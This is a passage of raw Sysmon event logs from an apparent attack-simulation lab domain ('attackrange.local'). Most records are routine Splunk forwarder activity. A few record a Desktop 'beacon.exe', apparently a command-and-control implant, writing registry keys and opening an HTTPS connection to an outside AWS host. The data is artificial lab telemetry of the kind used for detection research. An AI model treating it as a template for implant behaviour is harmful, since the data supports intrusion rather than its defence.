Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01677B3066A77B305C072A19F5F05F43,SHA256=2155A0ED1BC9EE8F5F5EDCEB4A6B5B2E7E93B631815ADC57285AEFCE16B93837,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 12241200x800000000000000057344569Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:48.918{8B6011A9-E46E-6165-1E2A-00000000F101}4584C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057344568Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:48.914{8B6011A9-E46E-6165-1E2A-00000000F101}4584C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 11241100x800000000000000057344567Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:48.583{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344566Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:48.583{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=90C3B7F4E35557867C78F73432075D36,SHA256=B08C1B513BD39AB4ECADD2F987B8B44493FD356971992F34516C6CA6DE99CC9Dfalsetrue 11241100x800000000000000057344565Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:48.452{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344564Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:48.452{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83EBAB71562CE9A9D8E9BE185D4D4AC1,SHA256=E5996A76863F04FA734A62638C831660D9FD47540964FF92BF6AD764DCB0268Bfalsetrue 23542300x800000000000000021219350Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:48.194{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=76DF123CA4D4EEA6448A46FCE1AD8C42,SHA256=E228F1F1A7BEED4D020CE1AD0D4FA50569E4E3B292F1AF72A022467032E0D3C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219349Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:48.194{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA9C711A8F0E42631068669DF62C7682,SHA256=D38721D54B6525E813B70B7464F32D0539E50A21E165A38E2E9105076DDCD1A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219353Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:49.725{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DAF0290998DABF88A3269A41B385451,SHA256=AA7606C57D5F37C4BE45F2EA837D7B5C8A642D4427BA8D69C6806F6E16D1A3FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344573Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:49.934{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344572Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:49.934{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CE874621D954AB930AB0DACF576FD93B,SHA256=FDE945A750E6391C63512ED5A27C5608595DAB9A330EB0FCED8FCED570EC0661falsetrue 11241100x800000000000000057344571Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:49.466{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344570Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:49.466{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=540588F5EEB00462282C88E0C585A3BF,SHA256=767DF8776889FBA82AC09CAE2B206F622F16F72460D99DB4B5E99BF69FF3F70Ffalsetrue 354300x800000000000000021219352Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:35.514{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64306-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219354Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:50.741{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33A61ECBBACF6835C9796EBE01002216,SHA256=65F91165B77CD2EAEE694DB0FD35BE4051E62374F1344C9CDCE5189F6FE8E3DC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344576Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:50.481{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344575Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:50.481{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC81706316DD32B72AE8AA6ED4273217,SHA256=6902B9F6EA2B974B16E70B5A86CCC28A5219F339D78E9B65BF74BAD6E8371170falsetrue 354300x800000000000000057344574Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:21.266{8B6011A9-E46E-6165-1E2A-00000000F101}4584C:\Users\Administrator\Desktop\beacon.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local54521-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 23542300x800000000000000021219355Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:51.741{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C644CE7627E07AA660619D42BC2DCBCC,SHA256=5925B65B3467BC966E2B1D44DD5605A82ADB807C4910EBE3748CA544B83479A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344578Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:51.515{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344577Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:51.514{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E88CD7B70645DFB655303E7C1D13955B,SHA256=BBD1F3710FE0D11D299AFBED45F65C0053BA7D39452FEC1A280A303B5435616Efalsetrue 23542300x800000000000000021219356Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:52.756{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48EE0DB450A6F8C4B67196E9A3B1D58D,SHA256=2D760AF69836BDA6F86153FE33DBC1E88E680C2FC1C2E611F731D7A327DFFB75,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344582Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:52.533{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344581Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:52.533{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=955159FB178BBED1F90E6B29FDBB599B,SHA256=36D19DEE2BA96FE4B93A77627A2B92E8D96FE7411DAA57AFE2307C3937D54E61falsetrue 11241100x800000000000000057344580Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:52.249{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344579Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:52.249{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4CDB4B6ECD3C162934B409AADBDEB76,SHA256=CDAE5AB3E285E55CE3646F3FF7EC8BA1DB447674E10FB62301274078CC49E32Efalsetrue 23542300x800000000000000021219360Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:53.756{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2530F2371D69068749271862AF44C2A7,SHA256=04060A70338E183EA629C7A5068FB9CE4F462775AC47601D96D38D780B9764A4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344585Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:53.548{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344584Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:53.548{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4B182071774A38C63BD8384FEC195E6,SHA256=44E4976D2DC971CBAC16896A21DAED1D41B7787C7E590185DB580C32AAF015AAfalsetrue 354300x800000000000000021219359Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:40.660{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64307-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219358Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:53.412{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2BE85B8C96C25534932D693BF33A643E,SHA256=3E7F91E6B93F6E39F2BCA34CA25ED4CA21AD4359A1AB2A645655E1230367D46B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219357Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:53.412{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=76DF123CA4D4EEA6448A46FCE1AD8C42,SHA256=E228F1F1A7BEED4D020CE1AD0D4FA50569E4E3B292F1AF72A022467032E0D3C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057344583Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:23.601{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54522-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219361Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:54.756{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F61C5C9669969501C9A0814EB6242305,SHA256=A40ED43025915661E0A2CFB9DE6D27D8137F9BE19BAE7ACD3EB63AD2D89471B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344587Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:54.578{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344586Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:54.578{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7099B41B6063756D2C2388ECD283BED8,SHA256=D060C109FC7805A1D3121DB072742E7C88C4A89D31BF1F1C729ABDD75F72D137falsetrue 23542300x800000000000000021219362Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:55.756{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D55A126444B6A47363D9F92D35EB7C3,SHA256=15BBB38860C0BD1279DFB20F0B0A458DCF484DC2A89930169F00EC702D9F416A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344589Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:55.597{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344588Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:55.597{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27647BBDAF37932BC487B6034902F750,SHA256=90D8D3E07DCE074DFB62933C2A16D0824B807B8A0BEB8B590371150CC21CC9E9falsetrue 23542300x800000000000000021219363Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:56.756{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=451E66EBDFF7C746E785B5CCD19DF105,SHA256=4DFAD6556A39534BB883F70120A6DDFF72951AEACF5A703EBA4A220FBA9B9535,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344591Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:56.615{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344590Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:56.615{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46CB691BD649BA1CFD5FCE4D9CC89CC6,SHA256=E7B2F16D857107D1145133D71600B08494C0818416947B163712A04CD913B698falsetrue 23542300x800000000000000021219364Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:57.756{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE6C8DB4453966ED838B84E656907F33,SHA256=D46FE60442C00256FA644CEEC4300D683751EDCD1A87509FF22D59A21E3D8BC1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344593Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:57.634{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344592Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:57.634{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A0D6457D23DCA221A433F088DCEFCD5,SHA256=5FD0721A672C52A72AE472999176457D57A7828BC470D5C40EFA2A1498919C49falsetrue 11241100x800000000000000057344599Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:58.649{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344598Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:58.649{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8B43ACA7EDBE83E9AF1998011731BE6,SHA256=DBBC40876F9E6EE2F8DEED0A6B334B63E2AEE364FE6DDC7908123A5E31A3C0B2falsetrue 23542300x800000000000000021219365Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:58.756{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5C7065E3329C4E2B09916A8F45B3642,SHA256=48682661FA9DC4F0BC75FEDA9E435422433F3AD50C9080B7C8D61F1538775C6A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344597Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:58.196{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344596Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:58.196{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02FC92F2FA6C1F067740DCBAAB6E1878,SHA256=98192B5707A3A075A738941316170233F63DC9A35AAA8BC90DF844FAE942F434falsetrue 11241100x800000000000000057344595Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:58.196{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344594Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:58.196{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D800598261BF4021EDFA3A69657E9937,SHA256=A15261668CFB2DD85674D8150828E45EFF26C3EAA189635D8BE1B5D4C42A3B28falsetrue 11241100x800000000000000057344614Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:59.663{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344613Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:59.663{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B304CFF313CB2E196B232E047BAE32A,SHA256=6F372768E326F7B20EAD6D8E12F416E6E445EA4EE9E62454BF829EC7C0D19BD2falsetrue 23542300x800000000000000021219368Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:59.756{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A23A1FEDF9B498EECAD9905B7DC9D059,SHA256=045DF17672E218AE0BE9D20B2CA373A02BAA6C30CC59866933E6517761144A7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057344612Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:29.532{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54523-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 13241300x800000000000000057344611Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:59.463{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000057344610Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:59.463{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0xa35fc4e3) 12241200x800000000000000057344609Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:59.463{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime 13241300x800000000000000057344608Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:15:59.463{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7d7b6-0xab9a6ad3) 